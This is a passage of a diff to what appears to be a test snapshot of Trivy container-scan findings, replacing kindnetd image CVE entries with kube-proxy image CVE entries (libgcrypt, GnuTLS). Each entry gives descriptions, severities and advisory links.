"https://www.sqlite.org/src/info/90acdbfce9c08858", }, ], - "severity": "LOW", + "severity": "HIGH", }, { "attributes": { "fixedVersion": undefined, - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2012-2663", - "installedVersion": "1.8.5-3~bpo10+1", - "packageName": "libxtables12", + "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.24.0 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2021-33560", + "installedVersion": "1.8.7-6", + "packageName": "libgcrypt20", "references": [ - "http://www.spinics.net/lists/netfilter-devel/msg21248.html", - "https://access.redhat.com/security/cve/CVE-2012-2663", - "https://bugzilla.redhat.com/show_bug.cgi?id=826702", - "https://nvd.nist.gov/vuln/detail/CVE-2012-2663", - "https://www.cve.org/CVERecord?id=CVE-2012-2663", + "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2021-33560.json", + "https://access.redhat.com/security/cve/CVE-2021-33560", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-33560", + "https://dev.gnupg.org/T5305", + "https://dev.gnupg.org/T5328", + "https://dev.gnupg.org/T5466", + "https://dev.gnupg.org/rCe8b7f10be275bcedb5fc05ed4837a89bfd605c61", + "https://eprint.iacr.org/2021/923", + "https://errata.almalinux.org/8/ALSA-2021-4409.html", + "https://linux.oracle.com/cve/CVE-2021-33560.html", + "https://linux.oracle.com/errata/ELSA-2022-9263.html", + "https://lists.debian.org/debian-lts-announce/2021/06/msg00021.html", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/BKKTOIGFW2SGN3DO2UHHVZ7MJSYN4AAB/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/R7OAPCUGPF3VLA7QAJUQSL255D4ITVTL/", + "https://nvd.nist.gov/vuln/detail/CVE-2021-33560", + "https://security.gentoo.org/glsa/202210-13", + "https://ubuntu.com/security/notices/USN-5080-1", + "https://ubuntu.com/security/notices/USN-5080-2", + "https://www.cve.org/CVERecord?id=CVE-2021-33560", + "https://www.oracle.com/security-alerts/cpuapr2022.html", + "https://www.oracle.com/security-alerts/cpujan2022.html", + "https://www.oracle.com/security-alerts/cpujul2022.html", + "https://www.oracle.com/security-alerts/cpuoct2021.html", ], }, "category": "Vulnerability", - "description": "extensions/libxt_tcp.c in iptables through 1.4.21 does not match TCP SYN+FIN packets in --syn rules, which might allow remote attackers to bypass intended firewall restrictions via crafted packets. NOTE: the CVE-2012-6638 fix makes this issue less relevant.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", + "description": "Libgcrypt before 1.8.8 and 1.9.x before 1.9.3 mishandles ElGamal encryption because it lacks exponent blinding to address a side-channel attack against mpi_powm, and the window size is not chosen appropriately. This, for example, affects use of ElGamal in OpenPGP.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", "mitigation": undefined, - "name": "iptables: --syn flag bypass", + "name": "libgcrypt: mishandles ElGamal encryption because it lacks exponent blinding to address a side-channel attack against mpi_powm", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2012-2663", + "value": "https://avd.aquasec.com/nvd/cve-2021-33560", }, { "type": "URL", - "value": "http://www.spinics.net/lists/netfilter-devel/msg21248.html", + "value": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2021-33560.json", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2012-2663", + "value": "https://access.redhat.com/security/cve/CVE-2021-33560", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=826702", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-33560", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2012-2663", + "value": "https://dev.gnupg.org/T5305", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2012-2663", + "value": "https://dev.gnupg.org/T5328", + }, + { + "type": "URL", + "value": "https://dev.gnupg.org/T5466", + }, + { + "type": "URL", + "value": "https://dev.gnupg.org/rCe8b7f10be275bcedb5fc05ed4837a89bfd605c61", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2019-11360", - "installedVersion": "1.8.5-3~bpo10+1", - "packageName": "libxtables12", - "references": [ - "https://0day.work/cve-2019-11360-bufferoverflow-in-iptables-restore-v1-8-2/", - "https://access.redhat.com/security/cve/CVE-2019-11360", - "https://git.netfilter.org/iptables/commit/iptables/xshared.c?id=2ae1099a42e6a0f06de305ca13a842ac83d4683e", - "https://nvd.nist.gov/vuln/detail/CVE-2019-11360", - "https://www.cve.org/CVERecord?id=CVE-2019-11360", - ], - }, - "category": "Vulnerability", - "description": "A buffer overflow in iptables-restore in netfilter iptables 1.8.2 allows an attacker to (at least) crash the program or potentially gain code execution via a specially crafted iptables-save file. This is related to add_param_to_argv in xshared.c.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", - "mitigation": undefined, - "name": "iptables: buffer overflow in iptables-restore", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2019-11360", + "value": "https://eprint.iacr.org/2021/923", }, { "type": "URL", - "value": "https://0day.work/cve-2019-11360-bufferoverflow-in-iptables-restore-v1-8-2/", + "value": "https://errata.almalinux.org/8/ALSA-2021-4409.html", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2019-11360", + "value": "https://linux.oracle.com/cve/CVE-2021-33560.html", }, { "type": "URL", - "value": "https://git.netfilter.org/iptables/commit/iptables/xshared.c?id=2ae1099a42e6a0f06de305ca13a842ac83d4683e", + "value": "https://linux.oracle.com/errata/ELSA-2022-9263.html", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2019-11360", + "value": "https://lists.debian.org/debian-lts-announce/2021/06/msg00021.html", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2019-11360", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/BKKTOIGFW2SGN3DO2UHHVZ7MJSYN4AAB/", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": "1.3.8+dfsg-3+deb10u1", - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2021-24031", - "installedVersion": "1.3.8+dfsg-3", - "packageName": "libzstd1", - "references": [ - "https://access.redhat.com/security/cve/CVE-2021-24031", - "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=981404", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-24031", - "https://github.com/facebook/zstd/issues/1630", - "https://nvd.nist.gov/vuln/detail/CVE-2021-24031", - "https://ubuntu.com/security/notices/USN-4760-1", - "https://ubuntu.com/security/notices/USN-5720-1", - "https://www.cve.org/CVERecord?id=CVE-2021-24031", - "https://www.facebook.com/security/advisories/cve-2021-24031", - ], - }, - "category": "Vulnerability", - "description": "In the Zstandard command-line utility prior to v1.4.1, output files were created with default permissions. Correct file permissions (matching the input) would only be set at completion time. Output files could therefore be readable or writable to unintended parties.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", - "mitigation": undefined, - "name": "zstd: adds read permissions to files while being compressed or uncompressed", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2021-24031", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/R7OAPCUGPF3VLA7QAJUQSL255D4ITVTL/", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2021-24031", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-33560", }, { "type": "URL", - "value": "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=981404", + "value": "https://security.gentoo.org/glsa/202210-13", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-24031", + "value": "https://ubuntu.com/security/notices/USN-5080-1", }, { "type": "URL", - "value": "https://github.com/facebook/zstd/issues/1630", + "value": "https://ubuntu.com/security/notices/USN-5080-2", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-24031", + "value": "https://www.cve.org/CVERecord?id=CVE-2021-33560", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-4760-1", + "value": "https://www.oracle.com/security-alerts/cpuapr2022.html", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5720-1", + "value": "https://www.oracle.com/security-alerts/cpujan2022.html", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2021-24031", + "value": "https://www.oracle.com/security-alerts/cpujul2022.html", }, { "type": "URL", - "value": "https://www.facebook.com/security/advisories/cve-2021-24031", + "value": "https://www.oracle.com/security-alerts/cpuoct2021.html", }, ], - "severity": "MEDIUM", + "severity": "HIGH", }, { "attributes": { - "fixedVersion": "1.3.8+dfsg-3+deb10u2", - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2021-24032", - "installedVersion": "1.3.8+dfsg-3", - "packageName": "libzstd1", + "fixedVersion": undefined, + "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.24.0 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2018-6829", + "installedVersion": "1.8.7-6", + "packageName": "libgcrypt20", "references": [ - "https://access.redhat.com/security/cve/CVE-2021-24032", - "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=982519", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-24032", - "https://github.com/facebook/zstd/issues/2491", - "https://nvd.nist.gov/vuln/detail/CVE-2021-24032", - "https://ubuntu.com/security/notices/USN-4760-1", - "https://ubuntu.com/security/notices/USN-5720-1", - "https://www.cve.org/CVERecord?id=CVE-2021-24032", - "https://www.facebook.com/security/advisories/cve-2021-24032", + "https://access.redhat.com/security/cve/CVE-2018-6829", + "https://github.com/weikengchen/attack-on-libgcrypt-elgamal", + "https://github.com/weikengchen/attack-on-libgcrypt-elgamal/wiki", + "https://lists.gnupg.org/pipermail/gcrypt-devel/2018-February/004394.html", + "https://nvd.nist.gov/vuln/detail/CVE-2018-6829", + "https://www.cve.org/CVERecord?id=CVE-2018-6829", + "https://www.oracle.com/security-alerts/cpujan2020.html", ], }, "category": "Vulnerability", - "description": "Beginning in v1.4.1 and prior to v1.4.9, due to an incomplete fix for CVE-2021-24031, the Zstandard command-line utility created output files with default permissions and restricted those permissions immediately afterwards. Output files could therefore momentarily be readable or writable to unintended parties.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", + "description": "cipher/elgamal.c in Libgcrypt through 1.8.2, when used to encrypt messages directly, improperly encodes plaintexts, which allows attackers to obtain sensitive information by reading ciphertext data (i.e., it does not have semantic security in face of a ciphertext-only attack). The Decisional Diffie-Hellman (DDH) assumption does not hold for Libgcrypt's ElGamal implementation.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", "mitigation": undefined, - "name": "zstd: Race condition allows attacker to access world-readable destination file", + "name": "libgcrypt: ElGamal implementation doesn't have semantic security due to incorrectly encoded plaintexts possibly allowing to obtain sensitive information", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2021-24032", - }, - { - "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2021-24032", - }, - { - "type": "URL", - "value": "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=982519", + "value": "https://avd.aquasec.com/nvd/cve-2018-6829", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-24032", + "value": "https://access.redhat.com/security/cve/CVE-2018-6829", }, { "type": "URL", - "value": "https://github.com/facebook/zstd/issues/2491", + "value": "https://github.com/weikengchen/attack-on-libgcrypt-elgamal", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-24032", + "value": "https://github.com/weikengchen/attack-on-libgcrypt-elgamal/wiki", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-4760-1", + "value": "https://lists.gnupg.org/pipermail/gcrypt-devel/2018-February/004394.html", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5720-1", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2018-6829", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2021-24032", + "value": "https://www.cve.org/CVERecord?id=CVE-2018-6829", }, { "type": "URL", - "value": "https://www.facebook.com/security/advisories/cve-2021-24032", + "value": "https://www.oracle.com/security-alerts/cpujan2020.html", }, ], - "severity": "MEDIUM", + "severity": "LOW", }, { "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2007-5686", - "installedVersion": "1:4.5-1.1", - "packageName": "login", + "fixedVersion": "3.7.1-5+deb11u2", + "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.24.0 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2022-2509", + "installedVersion": "3.7.1-5", + "packageName": "libgnutls30", "references": [ - "http://secunia.com/advisories/27215", - "http://www.securityfocus.com/archive/1/482129/100/100/threaded", - "http://www.securityfocus.com/archive/1/482857/100/0/threaded", - "http://www.securityfocus.com/bid/26048", - "http://www.vupen.com/english/advisories/2007/3474", - "https://issues.rpath.com/browse/RPL-1825", + "https://access.redhat.com/errata/RHSA-2022:6854", + "https://access.redhat.com/security/cve/CVE-2022-2509", + "https://bugzilla.redhat.com/2108977", + "https://bugzilla.redhat.com/show_bug.cgi?id=2076626", + "https://bugzilla.redhat.com/show_bug.cgi?id=2108635", + "https://bugzilla.redhat.com/show_bug.cgi?id=2108977", + "https://bugzilla.redhat.com/show_bug.cgi?id=2119770", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2509", + "https://errata.almalinux.org/9/ALSA-2022-6854.html", + "https://errata.rockylinux.org/RLSA-2022:6854", + "https://gnutls.org/security-new.html (GNUTLS-SA-2022-07-07)", + "https://gnutls.org/security-new.html#GNUTLS-SA-2022-07-07", + "https://linux.oracle.com/cve/CVE-2022-2509.html", + "https://linux.oracle.com/errata/ELSA-2022-7105.html", + "https://lists.debian.org/debian-lts-announce/2022/08/msg00002.html", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/6FL27JS3VM74YEQU7PGB62USO3KSBYZX/", + "https://lists.gnupg.org/pipermail/gnutls-help/2022-July/004746.html", + "https://nvd.nist.gov/vuln/detail/CVE-2022-2509", + "https://ubuntu.com/security/notices/USN-5550-1", + "https://www.cve.org/CVERecord?id=CVE-2022-2509", + "https://www.debian.org/security/2022/dsa-5203", ], }, "category": "Vulnerability", - "description": "initscripts in rPath Linux 1 sets insecure permissions for the /var/log/btmp file, which allows local users to obtain sensitive information regarding authentication attempts. NOTE: because sshd detects the insecure permissions and does not log certain events, this also prevents sshd from logging failed authentication attempts by remote attackers.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", + "description": "A vulnerability found in gnutls. This security flaw happens because of a double free error occurs during verification of pkcs7 signatures in gnutls_pkcs7_verify function.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", "mitigation": undefined, - "name": "initscripts in rPath Linux 1 sets insecure permissions for the /var/lo ...", + "name": "Double free during gnutls_pkcs7_verify", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2007-5686", + "value": "https://avd.aquasec.com/nvd/cve-2022-2509", }, { "type": "URL", - "value": "http://secunia.com/advisories/27215", + "value": "https://access.redhat.com/errata/RHSA-2022:6854", }, { "type": "URL", - "value": "http://www.securityfocus.com/archive/1/482129/100/100/threaded", + "value": "https://access.redhat.com/security/cve/CVE-2022-2509", }, { "type": "URL", - "value": "http://www.securityfocus.com/archive/1/482857/100/0/threaded", + "value": "https://bugzilla.redhat.com/2108977", }, { "type": "URL", - "value": "http://www.securityfocus.com/bid/26048", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2076626", }, { "type": "URL", - "value": "http://www.vupen.com/english/advisories/2007/3474", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2108635", }, { "type": "URL", - "value": "https://issues.rpath.com/browse/RPL-1825", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2108977", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2013-4235", - "installedVersion": "1:4.5-1.1", - "packageName": "login", - "references": [ - "https://access.redhat.com/security/cve/CVE-2013-4235", - "https://access.redhat.com/security/cve/cve-2013-4235", - "https://bugs.launchpad.net/ubuntu/+source/shadow/+bug/1998169", - "https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2013-4235", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-4235", - "https://github.com/shadow-maint/shadow/issues/317", - "https://github.com/shadow-maint/shadow/pull/545", - "https://lists.apache.org/thread.html/rf9fa47ab66495c78bb4120b0754dd9531ca2ff0430f6685ac9b07772%40%3Cdev.mina.apache.org%3E", - "https://nvd.nist.gov/vuln/detail/CVE-2013-4235", - "https://security-tracker.debian.org/tracker/CVE-2013-4235", - "https://security.gentoo.org/glsa/202210-26", - "https://ubuntu.com/security/notices/USN-5745-1", - "https://ubuntu.com/security/notices/USN-5745-2", - "https://www.cve.org/CVERecord?id=CVE-2013-4235", - ], - }, - "category": "Vulnerability", - "description": "shadow: TOCTOU (time-of-check time-of-use) race condition when copying and removing directory trees", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", - "mitigation": undefined, - "name": "shadow-utils: TOCTOU race conditions by copying and removing directory trees", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2013-4235", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2119770", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2013-4235", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2509", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/cve-2013-4235", + "value": "https://errata.almalinux.org/9/ALSA-2022-6854.html", }, { "type": "URL", - "value": "https://bugs.launchpad.net/ubuntu/+source/shadow/+bug/1998169", + "value": "https://errata.rockylinux.org/RLSA-2022:6854", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2013-4235", + "value": "https://gnutls.org/security-new.html (GNUTLS-SA-2022-07-07)", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-4235", + "value": "https://gnutls.org/security-new.html#GNUTLS-SA-2022-07-07", }, { "type": "URL", - "value": "https://github.com/shadow-maint/shadow/issues/317", + "value": "https://linux.oracle.com/cve/CVE-2022-2509.html", }, { "type": "URL", - "value": "https://github.com/shadow-maint/shadow/pull/545", + "value": "https://linux.oracle.com/errata/ELSA-2022-7105.html", }, { "type": "URL", - "value": "https://lists.apache.org/thread.html/rf9fa47ab66495c78bb4120b0754dd9531ca2ff0430f6685ac9b07772%40%3Cdev.mina.apache.org%3E", + "value": "https://lists.debian.org/debian-lts-announce/2022/08/msg00002.html", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2013-4235", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/6FL27JS3VM74YEQU7PGB62USO3KSBYZX/", }, { "type": "URL", - "value": "https://security-tracker.debian.org/tracker/CVE-2013-4235", + "value": "https://lists.gnupg.org/pipermail/gnutls-help/2022-July/004746.html", }, { "type": "URL", - "value": "https://security.gentoo.org/glsa/202210-26", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-2509", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5745-1", + "value": "https://ubuntu.com/security/notices/USN-5550-1", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5745-2", + "value": "https://www.cve.org/CVERecord?id=CVE-2022-2509", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2013-4235", + "value": "https://www.debian.org/security/2022/dsa-5203", }, ], - "severity": "LOW", + "severity": "HIGH", }, { "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2018-7169", - "installedVersion": "1:4.5-1.1", - "packageName": "login", + "fixedVersion": "3.7.1-5+deb11u3", + "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.24.0 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2023-0361", + "installedVersion": "3.7.1-5", + "packageName": "libgnutls30", "references": [ - "https://access.redhat.com/security/cve/CVE-2018-7169", - "https://bugs.launchpad.net/ubuntu/+source/shadow/+bug/1729357", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-7169", - "https://github.com/shadow-maint/shadow/pull/97", - "https://nvd.nist.gov/vuln/detail/CVE-2018-7169", - "https://security.gentoo.org/glsa/201805-09", - "https://ubuntu.com/security/notices/USN-5254-1", - "https://www.cve.org/CVERecord?id=CVE-2018-7169", + "https://access.redhat.com/errata/RHSA-2023:1141", + "https://access.redhat.com/security/cve/CVE-2023-0361", + "https://bugzilla.redhat.com/2162596", + "https://bugzilla.redhat.com/show_bug.cgi?id=2131152", + "https://bugzilla.redhat.com/show_bug.cgi?id=2162596", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0361", + "https://errata.almalinux.org/9/ALSA-2023-1141.html", + "https://errata.rockylinux.org/RLSA-2023:1569", + "https://github.com/tlsfuzzer/tlsfuzzer/pull/679", + "https://gitlab.com/gnutls/gnutls/-/issues/1050", + "https://gnutls.org/security-new.html#GNUTLS-SA-2020-07-14", + "https://linux.oracle.com/cve/CVE-2023-0361.html", + "https://linux.oracle.com/errata/ELSA-2023-1569.html", + "https://lists.debian.org/debian-lts-announce/2023/02/msg00015.html", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/UFIA3X4IZ3CW7SRQ2UHNHNPMRIAWF2FI/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/WS4KVDOG6QTALWHC2QE4Y7VPDRMLTRWQ/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/Z634YBXAJ5VLDI62IOPBVP5K6YFHAWCY/", + "https://nvd.nist.gov/vuln/detail/CVE-2023-0361", + "https://security.netapp.com/advisory/ntap-20230324-0005/", + "https://ubuntu.com/security/notices/USN-5901-1", + "https://www.cve.org/CVERecord?id=CVE-2023-0361", ], }, "category": "Vulnerability", - "description": "An issue was discovered in shadow 4.5. newgidmap (in shadow-utils) is setuid and allows an unprivileged user to be placed in a user namespace where setgroups(2) is permitted. This allows an attacker to remove themselves from a supplementary group, which may allow access to certain filesystem paths if the administrator has used "group blacklisting" (e.g., chmod g-rwx) to restrict access to paths. This flaw effectively reverts a security feature in the kernel (in particular, the /proc/self/setgroups knob) to prevent this sort of privilege escalation.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", + "description": "A timing side-channel in the handling of RSA ClientKeyExchange messages was discovered in GnuTLS. This side-channel can be sufficient to recover the key encrypted in the RSA ciphertext across a network in a Bleichenbacher style attack. To achieve a successful decryption the attacker would need to send a large amount of specially crafted messages to the vulnerable server. By recovering the secret from the ClientKeyExchange message, the attacker would be able to decrypt the application data exchanged over that connection.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", "mitigation": undefined, - "name": "shadow-utils: newgidmap allows unprivileged user to drop supplementary groups potentially allowing privilege escalation", + "name": "timing side-channel in the TLS RSA key exchange code", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2018-7169", + "value": "https://avd.aquasec.com/nvd/cve-2023-0361", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2018-7169", + "value": "https://access.redhat.com/errata/RHSA-2023:1141", }, { "type": "URL", - "value": "https://bugs.launchpad.net/ubuntu/+source/shadow/+bug/1729357", + "value": "https://access.redhat.com/security/cve/CVE-2023-0361", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-7169", + "value": "https://bugzilla.redhat.com/2162596", }, { "type": "URL", - "value": "https://github.com/shadow-maint/shadow/pull/97", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2131152", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2018-7169", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2162596", }, { "type": "URL", - "value": "https://security.gentoo.org/glsa/201805-09", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0361", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5254-1", + "value": "https://errata.almalinux.org/9/ALSA-2023-1141.html", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2018-7169", + "value": "https://errata.rockylinux.org/RLSA-2023:1569", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2019-19882", - "installedVersion": "1:4.5-1.1", - "packageName": "login", - "references": [ - "https://access.redhat.com/security/cve/CVE-2019-19882", - "https://bugs.archlinux.org/task/64836", - "https://bugs.gentoo.org/702252", - "https://github.com/shadow-maint/shadow/commit/edf7547ad5aa650be868cf2dac58944773c12d75", - "https://github.com/shadow-maint/shadow/pull/199", - "https://github.com/void-linux/void-packages/pull/17580", - "https://nvd.nist.gov/vuln/detail/CVE-2019-19882", - "https://security.gentoo.org/glsa/202008-09", - "https://www.cve.org/CVERecord?id=CVE-2019-19882", - ], - }, - "category": "Vulnerability", - "description": "shadow 4.8, in certain circumstances affecting at least Gentoo, Arch Linux, and Void Linux, allows local users to obtain root access because setuid programs are misconfigured. Specifically, this affects shadow 4.8 when compiled using --with-libpam but without explicitly passing --disable-account-tools-setuid, and without a PAM configuration suitable for use with setuid account management tools. This combination leads to account management tools (groupadd, groupdel, groupmod, useradd, userdel, usermod) that can easily be used by unprivileged local users to escalate privileges to root in multiple ways. This issue became much more relevant in approximately December 2019 when an unrelated bug was fixed (i.e., the chmod calls to suidusbins were fixed in the upstream Makefile which is now included in the release version 4.8).", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", - "mitigation": undefined, - "name": "shadow-utils: local users can obtain root access because setuid programs are misconfigured", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2019-19882", + "value": "https://github.com/tlsfuzzer/tlsfuzzer/pull/679", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2019-19882", + "value": "https://gitlab.com/gnutls/gnutls/-/issues/1050", }, { "type": "URL", - "value": "https://bugs.archlinux.org/task/64836", + "value": "https://gnutls.org/security-new.html#GNUTLS-SA-2020-07-14", }, { "type": "URL", - "value": "https://bugs.gentoo.org/702252", + "value": "https://linux.oracle.com/cve/CVE-2023-0361.html", }, { "type": "URL", - "value": "https://github.com/shadow-maint/shadow/commit/edf7547ad5aa650be868cf2dac58944773c12d75", + "value": "https://linux.oracle.com/errata/ELSA-2023-1569.html", }, { "type": "URL", - "value": "https://github.com/shadow-maint/shadow/pull/199", + "value": "https://lists.debian.org/debian-lts-announce/2023/02/msg00015.html", }, { "type": "URL", - "value": "https://github.com/void-linux/void-packages/pull/17580", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/UFIA3X4IZ3CW7SRQ2UHNHNPMRIAWF2FI/", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2019-19882", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/WS4KVDOG6QTALWHC2QE4Y7VPDRMLTRWQ/", }, { "type": "URL", - "value": "https://security.gentoo.org/glsa/202008-09", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/Z634YBXAJ5VLDI62IOPBVP5K6YFHAWCY/", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2019-19882", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2023-0361", + }, + { + "type": "URL", + "value": "https://security.netapp.com/advisory/ntap-20230324-0005/", + }, + { + "type": "URL", + "value": "https://ubuntu.com/security/notices/USN-5901-1", + }, + { + "type": "URL", + "value": "https://www.cve.org/CVERecord?id=CVE-2023-0361", }, ], - "severity": "LOW", + "severity": "HIGH", }, { "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2023-29383", - "installedVersion": "1:4.5-1.1", - "packageName": "login", + "fixedVersion": "3.7.1-5+deb11u1", + "foundIn": "Target: 